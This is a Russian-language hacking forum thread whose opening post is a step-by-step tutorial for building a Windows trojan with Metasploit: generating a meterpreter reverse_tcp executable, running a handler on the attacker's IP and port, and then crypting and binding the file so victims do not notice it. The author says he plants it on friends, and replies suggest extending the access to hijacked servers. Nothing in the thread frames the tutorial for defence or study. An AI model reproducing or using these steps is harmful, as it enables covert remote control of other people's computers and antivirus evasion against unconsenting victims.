Троян с помощью Metasploit
В этой статье я вам расскажу как можно сделать трой с помощью Metasploit Framevork v 3.5.0
Приступим... Для начала обновим hands.ocx и mozg.dll Если сделали то идём дальше, открываем метасплоит и пишем: use windows/meterpreter/reverse_tcp Потом пишем: set lhost ваш_IP set lport port_на_котором_зависнет_трой После того, как сделали пишем следующее: generate -t exe -f zloi_troi.exe Жмём Enter и видем: Written * bytes Если не видим что-то сделали не так! Дальше идём по адресу: Metasploit/msf3 и видим zloi_troj.exe Это и есть наш трой :spiteful: Теперь клиент: Набираем: use exploit/multi/handler Затем: set lhost Ваш_IP set lport порт_указанный_ранее Пишем: exploit И ждём пока жертва запустит файлик :spiteful: Ну естественно трой надо закриптовать и склеить, трой маленький, так-что жертва врятли заподозрит что-то неладное, даже если будет знать реальный размер файла (с которым склеен трой) Я лично использую его чтобы друзьям подсунуть ( :spiteful: ) Но как использовать вам решать :) Добавлено через 5 минут Не судите строго, моя первоя статья :rolleyes: Записал видео [Ссылки доступны только зарегистрированным пользователям
. Регистрируйся тут...] |
Неплохо билоби описать команди , и розкрутить ход действий допустим до дедика.:)
А так молодец, новичкам будет позновательно *thumbs up* |
Цитата:
|
Спасибьо за статью! Никогда бы не подумал, что в метасплоите можно сделать троянчик да и ещё жертве отправить ))
|
я как-то спрашивал на форуме что можно замутить из метасплойта.
вот теперь знаю)) а по-конкретнее новичку, что этот трой делает кроме обеспечения связи между компьютером жертвы и меня? |
Завтра сделаю видео урок, там всё будет подробно описано (я и сегодня хотел сделать, но с камтазией проблемка была), а насчёт друзей, они не ведутся на разные проги по ускорению нета :(
Пишите в ЛС если хотите что-то узнать про метасплоит, сделаю видео урок *thumbs up* Добавлено через 39 секунд [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...], крутая аватарка :rofl: Добавлено через 3 минуты А, ещё на последок, в видеоуроке покажу как можно обмениватся файлами и ... ну впрочем всем самым вкусным :spiteful: Добавлено через 6 минут [Ссылки доступны только зарегистрированным пользователям . Регистрируйся тут...], всё исправлю, но насчёт дедика... может быть попозже, когда комп перестанет вырубацца и винду на виртуалку поставлю... |
Цитата:
|
Цитата:
|
А когда видео сделаешь?
|
Уже сделал :)
Добавлено через 1 минуту А, да с видео "неукладка" в момент с "вкусностями" начались лаги, и сьёмку пришлось прикратить :( Так что ждите "отдельное" видео, сделаю сегодня, слово даю *thumbs up* |
Часовой пояс GMT +4, время: 14:00. |